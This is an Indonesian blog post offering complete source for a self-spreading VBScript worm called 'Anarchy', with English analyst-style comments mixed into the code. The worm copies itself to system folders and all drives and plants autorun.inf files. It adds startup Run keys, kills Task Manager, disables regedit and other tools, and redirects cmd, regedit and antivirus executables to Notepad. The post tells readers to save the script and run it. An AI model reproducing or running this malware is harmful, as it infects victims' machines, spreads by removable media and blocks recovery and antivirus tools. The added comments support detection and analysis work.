Minggu, 31 Mei 2009

Belajar Buat Virus Dengan Vbs

Ni Adalah Sebuah Script Virus Vbs Yang Sangat Sederhana Virus Ni Dapat Di Ubah Di Tambah Dengan Selera Anda Masing2, Untuk Mempersingkat Waktu Dan Biar Gak Banyak Bacot Ni Scriptnya :
'Anarchy - not - Death
'
' Analyst summary (behaviour as written in this listing):
'   - reads its own source text and writes copies named Anarchy.dll.vbs / pubprn.vbs
'     into the Windows and System folders and onto removable and fixed drives
'   - drops an autorun.inf next to each drive copy (MITRE ATT&CK T1091)
'   - writes HKLM ...\CurrentVersion\Run values for persistence (T1547.001)
'   - writes Explorer/System policy values and Image File Execution Options
'     "Debugger" values that interfere with admin and AV tools (T1562.001, T1546.012)
' Indicators visible here: file names Anarchy.dll.vbs and pubprn.vbs, Run values
' anarchyW/S/C/D/E/F, IE window title ".:: AnarchyX ::.", IFEO Debugger = notepad.exe.
' Clean-up has to cover all of these: the dropped files, autorun.inf on every drive,
' the Run values, the policy values and the IFEO Debugger values.

' Runtime errors are suppressed from here on; failing statements are skipped silently.
on error resume next

'Variable declarations
dim rekur,windowpath,flash,anarki,af,autrn,at,rgdt,an,check,ad

'Prepare the autorun.inf content
' Both entries point at Anarchy.dll.vbs in the drive root. AutoRun for removable media
' is off by default on later Windows versions; on older hosts it is controlled by the
' NoDriveTypeAutoRun policy.
autrn = "[autorun]" & vbcrlf & "shellexecute=wscript.exe Anarchy.dll.vbs" & vbcrlf & "open=Anarchy.dll.vbs"
set anarki = createobject("Scripting.FileSystemObject")
' af: file object for the currently running script.
set af = anarki.getfile(Wscript.ScriptFullname)
dim text,size
size = af.size
' check: drive type of the drive the script was started from (1 = removable, 2 = fixed).
check = af.drive.drivetype
' Read the script's own source line by line into rekur (1 = ForReading, -2 = system default encoding).
set text = af.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
' Outer loop; its exit condition is the "loop while check <> 1" line near the end.
do

'Create the master copies
' GetSpecialFolder: 0 = Windows folder, 1 = System folder, 2 = Temp folder.
Set dirwin = anarki.GetSpecialFolder(0)
Set dirsystem = anarki.GetSpecialFolder(1)
Set dirtemp = anarki.GetSpecialFolder(2)
Set ac = anarki.GetFile(WScript.ScriptFullName)
' Copies are written to <System>\Anarchy.dll.vbs, <Windows>\Anarchy.dll.vbs and
' <System>\pubprn.vbs. pubprn.vbs is also the name of a Microsoft-shipped printing
' script, so a file with that name should be verified by hash/signature, not by name.
' After each copy, attribute values 4 (System) and 2 (Hidden) are assigned on ac.
ac.Copy(dirsystem&"\Anarchy.dll.vbs")
ac.attributes =4
ac.attributes =2
ac.Copy(dirwin&"\Anarchy.dll.vbs")
ac.attributes =4
ac.attributes =2
ac.Copy(dirsystem&"\pubprn.vbs")
ac.attributes =4
ac.attributes =2

'Spread to removable disks, together with an Autorun.inf
' Iterates every drive known to the FileSystemObject.
for each flash in anarki.drives

' Only drive types 1 (removable) and 2 (fixed) are handled; A: is skipped.
If (flash.drivetype = 1 or flash.drivetype = 2) and flash.path <> "A:" then

' Writes the source text held in rekur to <drive>\Anarchy.dll.vbs.
set at=anarki.getfile(flash.path &"\Anarchy.dll.vbs”")
ac.attributes =4
ac.attributes =2
set at=anarki.createtextfile(flash.path &"\Anarchy.dll.vbs",2,true)
at.write rekur
at.close
set at=anarki.getfile(flash.path &"\Anarchy.dll.vbs")
ac.attributes =4
ac.attributes =2
' Writes the autorun.inf content prepared above to <drive>\autorun.inf.
' An autorun.inf that references a .vbs file in a drive root is a strong detection signal.
set at =anarki.getfile(flash.path &"\autorun.inf")
ac.attributes =4
ac.attributes =2
set at=anarki.createtextfile(flash.path &"\autorun.inf",2,true)
at.write autrn
at.close
set at = anarki.getfile(flash.path &"\autorun.inf")
ac.attributes =4
ac.attributes =2
end if
' Calls that reference the copies at c:/, the Windows folder and the System folder
' (presumably meant to start them; intent inferred from the paths).
wscr.exec("c:/Anarchy.dll.vbs")
wscr.exec(dirwin&"\Anarchy.dll.vbs")
wscr.exec(dirsystem&"\Anarchy.dll.vbs")
On Error Resume Next
' Command line that force-terminates taskmgr.exe in a hidden window. A taskkill aimed at
' taskmgr.exe with wscript.exe/cscript.exe as parent is worth alerting on.
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide
'Registry manipulation

set rgdt = createobject("WScript.Shell")

'Change the IE window title
' User-visible indicator of infection.
rgdt.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",".:: AnarchyX ::."

'Keep hidden files from being shown
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"

'Block Find, Folder Options, Run, Regedit, Task Manager and right-click
' Values as written: NoFind, NoFolderOptions, NoRun, DisableRegistryTools and
' NoViewContextMenu are set to 1; DisableTaskMgr is written as 0. All are per-user (HKCU)
' policy values, so they must be checked in each affected user's hive during clean-up.
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1", "REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu","1","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Hidden","1","REG_DWORD"

on error resume next
'Activate at Windows startup
' Six HKLM Run values, one per hard-coded path. Writing under HKLM needs administrative
' rights, so running as a standard user limits this step. Run values that point at a
' .vbs file are uncommon on clean systems and make a useful hunting query.
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyW", "C:\WINDOWS\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyS", "C:\WINDOWS\system32\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyC", "C:\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyD", "D:\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyE", "E:\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyF", "F:\Anarchy.dll.vbs", "REG_SZ"


'Redirect the following applications: when one is opened, Notepad starts instead
' Sets the Image File Execution Options "Debugger" value to notepad.exe for Task Manager,
' cmd, the registry editors, installers named install.exe/setup.exe, and the PCMAV*
' executables (presumably the PCMAV antivirus). Any change to an IFEO Debugger value
' deserves an alert (for example via registry-value auditing); the values remain in
' effect until deleted, even after the script files are removed.
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"
'Bonus
' Pauses 1.5 s per drive iteration when the script was not started from a removable drive.
if check <> 1 then
Wscript.sleep 1500
end if
next
' check is assigned once before the loop and not changed inside it, so when the script
' was started from a non-removable drive this loop does not exit: expect a long-lived
' wscript.exe process that keeps rewriting the files and registry values above.
loop while check <> 1
' Reached only when the loop exits. Builds an explorer.exe command line with /e,/select
' on the script's own path; windowpath is declared above but not assigned in this listing.
set ad = createobject("Wscript.shell")
ad.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

Copy - Paste Ke NotepAd SAve Dengan Nama Anarchy.dll.vbs Ke directory Yang Anda Inginkan Sebagai Contoh C:\Anarchy\ Kemudian Jalankan Untuk Mengetahui Fungsi Kerja Virus Ini
Good Luck
